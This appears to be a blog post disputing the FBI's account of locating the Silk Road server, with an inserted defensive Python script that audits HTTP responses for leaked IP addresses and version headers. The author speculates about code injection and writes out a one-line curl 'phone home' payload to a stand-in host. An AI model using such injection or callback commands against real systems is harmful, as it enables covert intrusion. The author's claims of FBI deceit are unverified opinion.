A few hours ago Wired published details of the FBI’s rebuttal to the previously filed Ross Ulbricht defense motion, which proffered that the State’s case necessarily rested on evidence obtained from illegal searches (read: NSA dragnetting). The gist:
In the latest filing, however, former FBI agent Christopher Tarbell counters Ulbricht’s defense by describing just how he and another FBI agent located the Silk Road server in June of last year without any sophisticated intrusion: Instead, he says, they found a misconfiguration in an element of the Silk Road login page, which revealed its internet protocol (IP) address and thus its physical location.
As they typed “miscellaneous” strings of characters into the login page’s entry fields, Tarbell writes that they noticed an IP address associated with some data returned by the site didn’t match any known Tor “nodes,” the computers that bounce information through Tor’s anonymity network to obscure its true source. And when they entered that IP address directly into a browser, the Silk Road’s CAPTCHA prompt appeared, the garbled-letter image designed to prevent spam bots from entering the site.
The actual technical claim: arbitrary HTTP POSTs to the login form action leaked the server’s IP address in the response headers and/or the response body.
Probability of said claim: assuming Ulbricht (and the chain of ownership that preceded him) not to be idiots of the first order, ~0. The only likely “misconfiguration” would be the typical default configuration, which is to “leak” the web server and OS type/version in the response headers.
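As an added defender-side check (not code from the post or from the filing), the script below audits a captured login response for the two kinds of leak discussed above: headers that advertise server or OS software, and IP addresses in the headers or body that are either internal or not in a list of known Tor relays. The sample response and the relay list are constructed, using RFC 5737 documentation addresses as stand-ins for real ones.

```python
import ipaddress
import re

# Constructed sample response, not from the case: a login POST's reply that
# carries version banners and a raw address in both a header and the body.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Server: nginx/1.4.1 (Ubuntu)\r\n"
    "X-Powered-By: PHP/5.3.10\r\n"
    "Location: http://203.0.113.45/captcha.php\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><img src="http://203.0.113.45/captcha.png"><p>node 10.0.0.7</p></html>'
)
# Constructed stand-in for the list of known Tor relay addresses.
KNOWN_TOR_RELAYS = {"198.51.100.9"}
# Headers that advertise server/OS software and versions by default.
VERSION_HEADERS = ("server", "x-powered-by", "x-aspnet-version", "via")
# Checked explicitly rather than via ip.is_private, because the RFC 5737
# documentation ranges used in the sample count as private in ipaddress.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",
                  "127.0.0.0/8", "169.254.0.0/16")]
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

def split_response(raw):
    """Split a raw HTTP response into a lowercase header dict and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # [0] is the status line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, body

def find_leaks(raw, known_relays=KNOWN_TOR_RELAYS):
    """Return (kind, where, value) findings: version-disclosing headers, and
    IPv4 addresses in headers or body that are internal or not a known relay."""
    headers, body = split_response(raw)
    findings = [("version_disclosure", h, headers[h]) for h in VERSION_HEADERS if h in headers]
    seen = set()
    places = [("header:" + k, v) for k, v in headers.items()] + [("body", body)]
    for where, text in places:
        for m in IPV4_RE.findall(text):
            try:
                ip = ipaddress.ip_address(m)
            except ValueError:  # e.g. 999.1.1.1 matches the regex but is not an address
                continue
            if m in seen or m in known_relays:
                continue
            seen.add(m)
            kind = "internal_ip" if any(ip in n for n in INTERNAL_NETS) else "unexpected_public_ip"
            findings.append((kind, where, m))
    return findings
```

Run it against responses captured from your own service; an `unexpected_public_ip` finding in a `Location` header or an embedded resource URL is exactly the class of self-disclosure a hidden service must not produce.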
If we assume the FBI letter to be a half-truth, which frankly is not necessarily a reasonable presumption to make (as opposed to, say, the outright lie), we can ascertain a more accurate technical translation:
We sent a malicious string in the request body of a login submission to inject an executable code payload, $ curl http://laundry.forensics.fbi.gov, which essentially allowed us to perform a remote drive-by phone home on the target.
Now, if we assume the half-truthiness of the FBI in this matter, we can thus deduce a methodology of counter-attack by US intel organs against network obfuscation techniques, namely directly attacking the target at the application layer. In other words, the use of buffer overflow exploits (zero-day or not) against the target itself to perform drive-by phone homes, or, in a more sophisticated attack, to install a wiretap.
Going forward, one has to assume that the use of “cyber-hacking” as a means to facilitate a court-approved wiretap will be deemed legal in much the same way breaking into your property to install the old-fashioned wiretaps was deemed legally proper. Of course, I would be remiss not to point out that the legal sanctification of State hacking by organs of the justice department provides a very convenient laundromat for laundering the legality of any data collected by the 3-hop graphical dragnet (read: NSA).
Finally, it should be noted that it’s not surprising the State would eventually seize on this vector of attack. Since 1988 (the infamous Morris worm), it has been well known that the weakness of the internet was not in the layered protocol design itself but in the client-server software implementations of the protocol standards. In particular, C and C++ programs are susceptible to memory violations in string operations on data of arbitrary length, resulting in access violations that can produce malicious results if the violating data is carefully formatted to do exactly that. In a sense, it is enough of a problem that it could have killed the internet from the start if not for a sort of spontaneous, heuristic regime of security best practices that arose and limited the problem of rogue actors to a tolerable one.
But if the heuristic law saved the internet, it is the “rule of law” that will surely kill it (in terms of being a utopian instrument). For it is the latter which turns software vulnerabilities into a primary means of both wiretapping targets and laundering graphical dragnets, reminding us, once again, that the State is indeed its own agency and its preservation best executed by a type of competitive agency of invasion of the body snatchers.